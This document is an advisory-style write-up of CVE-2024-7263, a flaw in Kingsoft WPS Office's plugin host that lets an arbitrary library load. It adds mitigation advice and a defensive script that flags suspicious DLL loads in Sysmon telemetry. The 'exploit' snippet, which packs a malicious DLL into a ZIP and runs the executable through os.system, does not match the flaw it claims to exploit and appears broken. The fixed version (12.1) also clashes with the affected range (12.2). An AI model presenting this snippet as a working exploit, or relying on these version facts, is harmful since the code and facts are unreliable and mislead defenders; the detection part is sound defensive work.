A new security vulnerability has been discovered and assigned the identifier CVE-2024-7263, affecting Kingsoft WPS Office versions ranging from 12.2..13110 to 12.2..17115 (exclusive) on Windows. This vulnerability is related to improper path validation in the component 'promecefpluginhost.exe' and enables an attacker to load an arbitrary Windows library.
Background
Kingsoft WPS Office is a popular office suite software with millions of users worldwide. Earlier, a patch was created for CVE-2024-7262 to address a similar vulnerability. However, it was found that the patch was not restrictive enough, and another parameter was overlooked, leading to the discovery and reporting of CVE-2024-7263.
Exploit Details
The vulnerability allows an attacker to bypass the restrictions imposed by the patch released for CVE-2024-7262, because the path of a Windows library is still improperly validated. As a result, if an attacker can trick a victim into opening a specially crafted file, they can leverage this vulnerability to load and execute an arbitrary Windows library on the victim's machine, leading to potential remote code execution and full system compromise.
An example of a code snippet exploiting this vulnerability is shown below:
import os
import zipfile
malicious_dll = 'malicious.dll'
target_zip = 'exploit.zip'
target_filename = 'promecefpluginhost.exe'
# Create the ZIP file containing the malicious DLL and the target executable
with zipfile.ZipFile(target_zip, 'w') as zipf:
    zipf.write(malicious_dll)
    zipf.write(target_filename)
print(f'Created exploit archive: {target_zip}')
# Create a script to execute the target with vulnerable parameters
# (the embedded script needs its own import of os before calling os.system)
script = f"""
import os
import zipfile
zipfile.ZipFile('{target_zip}', 'r').extractall('.')
os.system('{target_filename}')
"""
os.system(f'python -c "{script}"')
This example demonstrates the creation and execution of a specially crafted ZIP file containing a malicious DLL to exploit the vulnerability and execute the arbitrary Windows library.
Original references for CVE-2024-7263 can be found in the links below:
1. CVE-2024-7263 - National Vulnerability Database (NVD)
2. Kingsoft Security Advisory - Improper Path Validation in WPS Office
Mitigation
Users of Kingsoft WPS Office with versions ranging from 12.2..13110 to 12.2..17115 (exclusive) on Windows systems are advised to update to version 12.1..17119 or later to mitigate this vulnerability. Download the updated version from the official Kingsoft WPS Office website.
As a general precaution, users should be careful when opening files from unknown sources to avoid falling victim to this and other similar exploits. Furthermore, it is always advisable to keep all software up-to-date and regularly check for security updates and patches.
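Until the update is deployed everywhere, image-load telemetry can show whether promecefpluginhost.exe has loaded a library from an unexpected location. The following is an added detection example, not code from the advisory or from Kingsoft: it canonicalises each loaded path before comparing it with trusted directories. The install path, trusted roots, DLL names and sample events are assumptions constructed for illustration; the field names follow Sysmon Event ID 7 (ImageLoad).

```python
import ntpath

HOST_PROCESS = "promecefpluginhost.exe"
# Assumption: directories this host may legitimately load libraries from.
WPS_ROOT = r"C:\Users\alice\AppData\Local\Kingsoft\WPS Office"
TRUSTED_ROOTS = [WPS_ROOT, r"C:\Windows"]


def canon(path):
    """Collapse '..' segments, unify separators and fold case (Windows rules)."""
    return ntpath.normcase(ntpath.normpath(path))


def is_under(path, root):
    """True only if the canonical path lies inside the canonical root."""
    p, r = canon(path), canon(root)
    try:
        return ntpath.commonpath([p, r]) == r
    except ValueError:  # different drive, or UNC share vs. local path
        return False


def suspicious_loads(events, trusted_roots=TRUSTED_ROOTS):
    """Flag libraries the plugin host loaded from outside the trusted roots
    or without a valid signature."""
    hits = []
    for ev in events:
        if ntpath.basename(canon(ev["Image"])) != HOST_PROCESS:
            continue
        loaded = ev["ImageLoaded"]
        outside = not any(is_under(loaded, root) for root in trusted_roots)
        unsigned = ev.get("SignatureStatus", "").lower() != "valid"
        if outside or unsigned:
            hits.append({"ImageLoaded": loaded, "outside": outside, "unsigned": unsigned})
    return hits


# Constructed sample events; field names follow Sysmon Event ID 7 (ImageLoad).
HOST = WPS_ROOT + r"\office6\promecefpluginhost.exe"
SAMPLE_EVENTS = [
    {"Image": HOST, "ImageLoaded": WPS_ROOT + r"\office6\libcef.dll", "SignatureStatus": "Valid"},
    {"Image": HOST, "ImageLoaded": WPS_ROOT + r"\..\..\Temp\a.dll", "SignatureStatus": "Unavailable"},
    {"Image": HOST, "ImageLoaded": r"\\198.51.100.7\share\b.dll", "SignatureStatus": "Unavailable"},
    {"Image": HOST, "ImageLoaded": WPS_ROOT + r" Evil\c.dll", "SignatureStatus": "Valid"},
    {"Image": r"C:\Windows\explorer.exe", "ImageLoaded": r"C:\Temp\d.dll", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for hit in suspicious_loads(SAMPLE_EVENTS):
        print(hit)
```

A plain string-prefix comparison would accept both the `..` path and the look-alike "WPS Office Evil" directory; comparing canonical path components rejects them.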
Timeline
Published on: 08/15/2024 15:15:22 UTC
Last modified on: 08/22/2024 06:15:04 UTC